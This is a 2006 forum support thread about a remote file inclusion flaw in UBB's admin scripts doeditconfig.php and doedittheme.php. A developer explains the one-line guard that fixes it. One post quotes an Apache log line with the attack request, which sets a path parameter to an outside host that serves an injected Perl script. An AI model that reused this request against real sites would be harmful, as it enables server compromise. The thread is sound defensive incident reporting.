|
|
Joined: May 2006
Posts: 9
stranger
|
stranger
Joined: May 2006
Posts: 9 |
There is a flaw in doedittheme.php and doeditconfig.php. The symptom is that the config.inc.php gets mostly truncated and the board is blank because it can't connect to the DB. The appropriate line in the apache log is: 158.39.35.18 - - [30/Sep/2006:00:29:13 -0700] "GET /ubb/admin/doeditconfig.php?thispath=../includes&config[path]=http://abok.us/cmd .gif? HTTP/1.1" 200 171 "-" "libwww-perl/5.65"
and
It also takes place with doedittheme as well. This is being run from multiple locations. We had a different one from spain with as well. I'm running 6.5.1 with the other security hold fixed manually. I'll update to 6.5.5, but I didn't see anything to indicate that this is fixed in the update.
|
|
|
|
Joined: May 2006
Posts: 9
stranger
|
stranger
Joined: May 2006
Posts: 9 |
The gif file injects a perl script. I have a copy of the script if you need it. I will be gone today, but I can do it tomorrow if you need.
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
This was fixed in either 6.5.4 or 6.5.5. Basically each of these scripts needs this line at the top after the block of header comments. This keeps these scripts from being called directly.
if (!defined('IS_ADMIN')) exit;
You probably got hit from multiple locations because this was reposted on bugtraq yesterday. It's the same description of the exploit that was posted a few months back when we put out 6.5.4 and 6.5.5.
|
|
|
|
Joined: Jun 2006
Posts: 742
enthusiast
|
enthusiast
Joined: Jun 2006
Posts: 742 |
Ah - yeah, I've had 4 or 5 clients hit with this today, this explains why the hacks are coming out of the woodwork. Thanks for the fix. <img src="https://www.ubbcentral.com/boards/images/graemlins/wink.gif" alt="" />
|
|
|
|
Joined: Oct 2006
Posts: 2
stranger
|
stranger
Joined: Oct 2006
Posts: 2 |
6.5.5?? The "Version notes" on the website only go up to 6.5.2, which is what we're running - have these not been updated? We've been hit with this same exploit.
|
|
|
|
Joined: Jun 2006
Posts: 9,242 Likes: 1
Former Developer
|
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1 |
It looks like the version notes haven't been updated. We did send out an email to all of our customers trying to make sure that everyone got notified of the problem and that an upgrade was available.
|
|
|
Bots
by Outdoorking - 04/13/2024 5:08 PM
|
|
|
|
|
|
3 members (Ruben, Nightcrawler, 1 invisible),
830
guests, and
271
robots. |
Key:
Admin,
Global Mod,
Mod
|
|
|
|
|